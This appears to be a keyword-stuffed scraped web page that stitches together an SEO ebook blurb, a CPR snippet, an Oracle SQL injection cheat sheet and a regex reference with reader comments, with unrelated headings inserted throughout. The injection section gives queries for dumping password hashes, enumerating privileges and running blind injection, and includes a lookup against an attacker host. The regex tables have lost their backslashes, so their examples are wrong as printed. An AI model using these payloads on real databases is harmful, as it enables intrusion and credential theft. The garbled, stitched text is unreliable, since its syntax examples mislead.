Got SEO writing questions? Game offroad simulator. We’ve got answers. Download our free 20+ page ebook featuring our most frequently asked questions on SEO keyword usage. Dear Twitpic Community - thank you for all the wonderful photos you have taken over the years. We have now placed Twitpic in an archived state.
- Regular Express Cheat Sheet
- East Bay Express Cheat Sheet
- Regular Expression Cheat Sheet
- Expression Cheat Sheet
- Nodejs Express Cheat Sheet
American Heart Association CPR Cheat Sheet. A quick reference guide for CPR. This is a free CPR Cheat Sheet. Alternative to Express Training Services.group cpr.
Some useful syntax reminders for SQL Injection into Oracle databases…
This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet.
The complete list of SQL Injection Cheat Sheets I’m working is:
I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here.
Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the end of the query.
| Version | SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’; SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’; SELECT version FROM v$instance; |
| Comments | SELECT 1 FROM dual — comment – NB: SELECT statements must have a FROM clause in Oracle so we have to use the dummy table name ‘dual’ when we’re not actually selecting from a table. |
| Current User | SELECT user FROM dual |
| List Users | SELECT username FROM all_users ORDER BY username; SELECT name FROM sys.user$; — priv |
| List Password Hashes | SELECT name, password, astatus FROM sys.user$ — priv, <= 10g. astatus tells you if acct is locked SELECT name,spare4 FROM sys.user$ — priv, 11g |
| Password Cracker | checkpwd will crack the DES-based hashes from Oracle 8, 9 and 10. |
| List Privileges | SELECT * FROM session_privs; — current privs SELECT * FROM dba_sys_privs WHERE grantee = ‘DBSNMP’; — priv, list a user’s privs SELECT grantee FROM dba_sys_privs WHERE privilege = ‘SELECT ANY DICTIONARY’; — priv, find users with a particular priv SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS; |
| List DBA Accounts | SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = ‘YES’; — priv, list DBAs, DBA roles |
| Current Database | SELECT global_name FROM global_name; SELECT name FROM v$database; SELECT instance_name FROM v$instance; SELECT SYS.DATABASE_NAME FROM DUAL; |
| List Databases | SELECT DISTINCT owner FROM all_tables; — list schemas (one per user) – Also query TNS listener for other databases. See tnscmd (services | status). |
| List Columns | SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’; SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’; |
| List Tables | SELECT table_name FROM all_tables; SELECT owner, table_name FROM all_tables; |
| Find Tables From Column Name | SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’; — NB: table names are upper case |
| Select Nth Row | SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; — gets 9th row (rows numbered from 1) |
| Select Nth Char | SELECT substr(‘abcd’, 3, 1) FROM dual; — gets 3rd character, ‘c’ |
| Bitwise AND | SELECT bitand(6,2) FROM dual; — returns 2 SELECT bitand(6,1) FROM dual; — returns0 |
| ASCII Value -> Char | SELECT chr(65) FROM dual; — returns A |
| Char -> ASCII Value | SELECT ascii(‘A’) FROM dual; — returns 65 |
| Casting | SELECT CAST(1 AS char) FROM dual; SELECT CAST(’1′ AS int) FROM dual; |
| String Concatenation | SELECT ‘A’ || ‘B’ FROM dual; — returns AB |
| If Statement | BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; — doesn’t play well with SELECT statements |
| Case Statement | SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; — returns 1 SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — returns 2 |
| Avoiding Quotes | SELECT chr(65) || chr(66) FROM dual; — returns AB |
| Time Delay | BEGIN DBMS_LOCK.SLEEP(5); END; — priv, can’t seem to embed this in a SELECT SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — if reverse looks are slow SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual; — if forward lookups are slow SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; — if outbound TCP is filtered / slow – Also see Heavy Queries to create a time delay |
| Make DNS Requests | SELECT UTL_INADDR.get_host_address(‘google.com’) FROM dual; SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; |
| Command Execution | Javacan be used to execute commands if it’s installed.ExtProc can sometimes be used too, though it normally failed for me. |
| Local File Access | UTL_FILE can sometimes be used. Check that the following is non-null: SELECT value FROM v$parameter2 WHERE name = ‘utl_file_dir’;Java can be used to read and write files if it’s installed (it is not available in Oracle Express). |
| Hostname, IP Address | SELECT UTL_INADDR.get_host_name FROM dual; SELECT host_name FROM v$instance; SELECT UTL_INADDR.get_host_address FROM dual; — gets IP address SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — gets hostnames |
| Location of DB files | SELECT name FROM V$DATAFILE; |
| Default/System Databases | SYSTEM SYSAUX |
Misc Tips
In no particular order, here are some suggestions from pentestmonkey readers.
From Christian Mehlmauer:
| Get all tablenames in one string | select rtrim(xmlagg(xmlelement(e, table_name || ‘,’)).extract(‘//text()’).extract(‘//text()’) ,’,') from all_tables – when using union based SQLI with only one row |
| Blind SQLI in order by clause | order by case when ((select 1 from user_tables where substr(lower(table_name), 1, 1) = ‘a’ and rownum = 1)=1) then column_name1 else column_name2 end — you must know 2 column names with the same datatype |
Tags: cheatsheet, database, oracle, pentest, sqlinjection
Posted in SQL Injection
The tables below are a reference to basic regex. While reading the rest of the site, when in doubt, you can always come back and look here. (It you want a bookmark, here's a direct link to the regex reference tables). I encourage you to print the tables so you have a cheat sheet on your desk for quick reference.
The tables are not exhaustive, for two reasons. First, every regex flavor is different, and I didn't want to crowd the page with overly exotic syntax. For a full reference to the particular regex flavors you'll be using, it's always best to go straight to the source. In fact, for some regex engines (such as Perl, PCRE, Java and .NET) you may want to check once a year, as their creators often introduce new features. The other reason the tables are not exhaustive is that I wanted them to serve as a quick introduction to regex. If you are a complete beginner, you should get a firm grasp of basic regex syntax just by reading the examples in the tables. I tried to introduce features in a logical order and to keep out oddities that I've never seen in actual use, such as the 'bell character'. With these tables as a jumping board, you will be able to advance to mastery by exploring the other pages on the site.
Regular Express Cheat Sheet
How to use the tables
The tables are meant to serve as an accelerated regex course, and they are meant to be read slowly, one line at a time. On each line, in the leftmost column, you will find a new element of regex syntax. The next column, 'Legend', explains what the element means (or encodes) in the regex syntax. The next two columns work hand in hand: the 'Example' column gives a valid regular expression that uses the element, and the 'Sample Match' column presents a text string that could be matched by the regular expression.You can read the tables online, of course, but if you suffer from even the mildest case of online-ADD (attention deficit disorder), like most of us… Well then, I highly recommend you print them out. You'll be able to study them slowly, and to use them as a cheat sheet later, when you are reading the rest of the site or experimenting with your own regular expressions.
Enjoy!
If you overdose, make sure not to miss the next page, which comes back down to Earth and talks about some really cool stuff: The 1001 ways to use Regex.
Regex Accelerated Course and Cheat Sheet
For easy navigation, here are some jumping points to various sections of the page:✽ Characters
✽ Quantifiers
✽ More Characters
✽ Logic
✽ More White-Space
✽ More Quantifiers
✽ Character Classes
✽ Anchors and Boundaries
✽ POSIX Classes
✽ Inline Modifiers
✽ Lookarounds
✽ Character Class Operations
East Bay Express Cheat Sheet
✽ Other Syntax
(direct link)
Characters
| Character | Legend | Example | Sample Match |
|---|---|---|---|
| d | Most engines: one digit from 0 to 9 | file_dd | file_25 |
| d | .NET, Python 3: one Unicode digit in any script | file_dd | file_9੩ |
| w | Most engines: 'word character': ASCII letter, digit or underscore | w-www | A-b_1 |
| w | .Python 3: 'word character': Unicode letter, ideogram, digit, or underscore | w-www | 字-ま_۳ |
| w | .NET: 'word character': Unicode letter, ideogram, digit, or connector | w-www | 字-ま‿۳ |
| s | Most engines: 'whitespace character': space, tab, newline, carriage return, vertical tab | asbsc | a b c |
| s | .NET, Python 3, JavaScript: 'whitespace character': any Unicode separator | asbsc | a b c |
| D | One character that is not a digit as defined by your engine's d | DDD | ABC |
| W | One character that is not a word character as defined by your engine's w | WWWWW | *-+=) |
| S | One character that is not a whitespace character as defined by your engine's s | SSSS | Yoyo |
(direct link)
Quantifiers
| Quantifier | Legend | Example | Sample Match |
|---|---|---|---|
| + | One or more | Version w-w+ | Version A-b1_1 |
| {3} | Exactly three times | D{3} | ABC |
| {2,4} | Two to four times | d{2,4} | 156 |
| {3,} | Three or more times | w{3,} | regex_tutorial |
| * | Zero or more times | A*B*C* | AAACC |
| ? | Once or none | plurals? | plural |
(direct link)
More Characters
| Character | Legend | Example | Sample Match |
|---|---|---|---|
| . | Any character except line break | a.c | abc |
| . | Any character except line break | .* | whatever, man. |
| . | A period (special character: needs to be escaped by a ) | a.c | a.c |
| Escapes a special character | .*+? $^/ | .*+? $^/ | |
| Escapes a special character | [{()}] | [{()}] |
(direct link)
Logic
| Logic | Legend | Example | Sample Match |
|---|---|---|---|
| | | Alternation / OR operand | 22|33 | 33 |
| ( … ) | Capturing group | A(nt|pple) | Apple (captures 'pple') |
| 1 | Contents of Group 1 | r(w)g1x | regex |
| 2 | Contents of Group 2 | (dd)+(dd)=2+1 | 12+65=65+12 |
| (?: … ) | Non-capturing group | A(?:nt|pple) | Apple |
(direct link)
More White-Space
| Character | Legend | Example | Sample Match |
|---|---|---|---|
| t | Tab | Ttw{2} | T ab |
| r | Carriage return character | see below | |
| n | Line feed character | see below | |
| rn | Line separator on Windows | ABrnCD | AB CD |
| N | Perl, PCRE (C, PHP, R…): one character that is not a line break | N+ | ABC |
| h | Perl, PCRE (C, PHP, R…), Java: one horizontal whitespace character: tab or Unicode space separator | ||
| H | One character that is not a horizontal whitespace | ||
| v | .NET, JavaScript, Python, Ruby: vertical tab | ||
| v | Perl, PCRE (C, PHP, R…), Java: one vertical whitespace character: line feed, carriage return, vertical tab, form feed, paragraph or line separator | ||
| V | Perl, PCRE (C, PHP, R…), Java: any character that is not a vertical whitespace | ||
| R | Perl, PCRE (C, PHP, R…), Java: one line break (carriage return + line feed pair, and all the characters matched by v) |
(direct link)
More Quantifiers
| Quantifier | Legend | Example | Sample Match |
|---|---|---|---|
| + | The + (one or more) is 'greedy' | d+ | 12345 |
| ? | Makes quantifiers 'lazy' | d+? | 1 in 12345 |
| * | The * (zero or more) is 'greedy' | A* | AAA |
| ? | Makes quantifiers 'lazy' | A*? | empty in AAA |
| {2,4} | Two to four times, 'greedy' | w{2,4} | abcd |
| ? | Makes quantifiers 'lazy' | w{2,4}? | ab in abcd |
(direct link)
Character Classes
| Character | Legend | Example | Sample Match |
|---|---|---|---|
| [ … ] | One of the characters in the brackets | [AEIOU] | One uppercase vowel |
| [ … ] | One of the characters in the brackets | T[ao]p | Tap or Top |
| - | Range indicator | [a-z] | One lowercase letter |
| [x-y] | One of the characters in the range from x to y | [A-Z]+ | GREAT |
| [ … ] | One of the characters in the brackets | [AB1-5w-z] | One of either: A,B,1,2,3,4,5,w,x,y,z |
| [x-y] | One of the characters in the range from x to y | [ -~]+ | Characters in the printable section of the ASCII table. |
| [^x] | One character that is not x | [^a-z]{3} | A1! |
| [^x-y] | One of the characters not in the range from x to y | [^ -~]+ | Characters that are not in the printable section of the ASCII table. |
| [dD] | One character that is a digit or a non-digit | [dD]+ | Any characters, inc- luding new lines, which the regular dot doesn't match |
| [x41] | Matches the character at hexadecimal position 41 in the ASCII table, i.e. A | [x41-x45]{3} | ABE |
(direct link)
Anchors and Boundaries
| Anchor | Legend | Example | Sample Match |
|---|---|---|---|
| ^ | Start of string or start of line depending on multiline mode. (But when [^inside brackets], it means 'not') | ^abc .* | abc (line start) |
| $ | End of string or end of line depending on multiline mode. Many engine-dependent subtleties. | .*? the end$ | this is the end |
| A | Beginning of string (all major engines except JS) | Aabc[dD]* | abc (string.. ..start) |
| z | Very end of the string Not available in Python and JS | the endz | this is..n..the end |
| Z | End of string or (except Python) before final line break Not available in JS | the endZ | this is..n..the endn |
| G | Beginning of String or End of Previous Match .NET, Java, PCRE (C, PHP, R…), Perl, Ruby | ||
| b | Word boundary Most engines: position where one side only is an ASCII letter, digit or underscore | Bob.*bcatb | Bob ate the cat |
| b | Word boundary .NET, Java, Python 3, Ruby: position where one side only is a Unicode letter, digit or underscore | Bob.*bкошкаb | Bob ate the кошка |
| B | Not a word boundary | c.*BcatB.* | copycats |
(direct link)
POSIX Classes
| Character | Legend | Example | Sample Match |
|---|---|---|---|
| [:alpha:] | PCRE (C, PHP, R…): ASCII letters A-Z and a-z | [8[:alpha:]]+ | WellDone88 |
| [:alpha:] | Ruby 2: Unicode letter or ideogram | [[:alpha:]d]+ | кошка99 |
| [:alnum:] | PCRE (C, PHP, R…): ASCII digits and letters A-Z and a-z | [[:alnum:]]{10} | ABCDE12345 |
| [:alnum:] | Ruby 2: Unicode digit, letter or ideogram | [[:alnum:]]{10} | кошка90210 |
| [:punct:] | PCRE (C, PHP, R…): ASCII punctuation mark | [[:punct:]]+ | ?!.,:; |
| [:punct:] | Ruby: Unicode punctuation mark | [[:punct:]]+ | ‽,:〽⁆ |
(direct link)
Inline Modifiers
None of these are supported in JavaScript. In Ruby, beware of (?s) and (?m)Regular Expression Cheat Sheet
.| Modifier | Legend | Example | Sample Match |
|---|---|---|---|
| (?i) | Case-insensitive mode (except JavaScript) | (?i)Monday | monDAY |
| (?s) | DOTALL mode (except JS and Ruby). The dot (.) matches new line characters (rn). Also known as 'single-line mode' because the dot treats the entire input as a single line | (?s)From A.*to Z | From A to Z |
| (?m) | Multiline mode (except Ruby and JS) ^ and $ match at the beginning and end of every line | (?m)1rn^2$rn^3$ | 1 2 3 |
| (?m) | In Ruby: the same as (?s) in other engines, i.e. DOTALL mode, i.e. dot matches line breaks | (?m)From A.*to Z | From A to Z |
| (?x) | Free-Spacing Mode mode (except JavaScript). Also known as comment mode or whitespace mode | (?x) # this is a # comment abc # write on multiple # lines [ ]d # spaces must be # in brackets | abc d |
| (?n) | .NET, PCRE 10.30+: named capture only | Turns all (parentheses) into non-capture groups. To capture, use named groups. | |
| (?d) | Java: Unix linebreaks only | The dot and the ^ and $ anchors are only affected by n | |
| (?^) | PCRE 10.32+: unset modifiers | Unsets ismnx modifiers |
(direct link)
Lookarounds
| Lookaround | Legend | Example | Sample Match |
|---|---|---|---|
| (?=…) | Positive lookahead | (?=d{10})d{5} | 01234 in 0123456789 |
| (?<=…) | Positive lookbehind | (?<=d)cat | cat in 1cat |
| (?!…) | Negative lookahead | (?!theatre)thew+ | theme |
| (?<!…) | Negative lookbehind | w{3}(?<!mon)ster | Munster |
(direct link)
Character Class Operations
| Class Operation | Legend | Example | Sample Match |
|---|---|---|---|
| […-[…]] | .NET: character class subtraction. One character that is in those on the left, but not in the subtracted class. | [a-z-[aeiou]] | Any lowercase consonant |
| […-[…]] | .NET: character class subtraction. | [p{IsArabic}-[D]] | An Arabic character that is not a non-digit, i.e., an Arabic digit |
| […&&[…]] | Java, Ruby 2+: character class intersection. One character that is both in those on the left and in the && class. | [S&&[D]] | An non-whitespace character that is a non-digit. |
| […&&[…]] | Java, Ruby 2+: character class intersection. | [S&&[D]&&[^a-zA-Z]] | An non-whitespace character that a non-digit and not a letter. |
| […&&[^…]] | Java, Ruby 2+: character class subtraction is obtained by intersecting a class with a negated class | [a-z&&[^aeiou]] | An English lowercase letter that is not a vowel. |
| […&&[^…]] | Java, Ruby 2+: character class subtraction | [p{InArabic}&&[^p{L}p{N}]] | An Arabic character that is not a letter or a number |
(direct link)
Other Syntax
| Syntax | Legend | Example | Sample Match |
|---|---|---|---|
| Keep Out Perl, PCRE (C, PHP, R…), Python's alternate regex engine, Ruby 2+: drop everything that was matched so far from the overall match to be returned | prefixKd+ | 12 | |
| Perl, PCRE (C, PHP, R…), Java: treat anything between the delimiters as a literal string. Useful to escape metacharacters. | Q(C++ ?)E | (C++ ?) |
Don't Miss The Regex Style Guide
and The Best Regex Trick Ever!!!
and The Best Regex Trick Ever!!!
The 1001 ways to use Regex
1-10 of 17 Threads
Subject: Very thoughtful and useful cheat sheet
Unlike lots of other cheat sheets or regex web sites, I was able (without much persistent regex knowledge) to apply the rules and to solve my problem. THANK YOU :)
Subject: Thanks a lot
Thanks a lot for the quick guide. It's really helpful.
Subject: Very useful site
Thank you soooooo much for this site. I'm using python regex for natural language processing in sentiment analysis and this helped me a lot.
Subject: Thank you! Excellent resource for any student
Thank you so much for this incredible cheatsheet! It is facilitating a lot my regex learning! God bless you and your passion!
Subject: Thank you for doing such a geat work.
I am now learning regex and for finding such a well organized site is a blessing! You are a good soul! Thank you for everything and stay inspired!
Subject: Simple = perfect
Subject: Congratulations
Expression Cheat Sheet
Well done, very useful page. Thank you for your effort. T
Subject: Thank you very much
Hi Rex,
Thankyou very much for compiling these. I am new to text analytics and is struggling a lot with regex. This is helping me a lot pick up. Great work
Thankyou very much for compiling these. I am new to text analytics and is struggling a lot with regex. This is helping me a lot pick up. Great work
Subject: Nice summary
Nice summary of regex. I was trying to remember how to group and I found the example above. Thanks.
Subject: Best Regex site ever
Nodejs Express Cheat Sheet
This is the best regex site ever on the internet. Regular Expressions are like any other language, they require time and effort to learn. RexEgg makes it an easy journey. Great work Author. Kudos to you.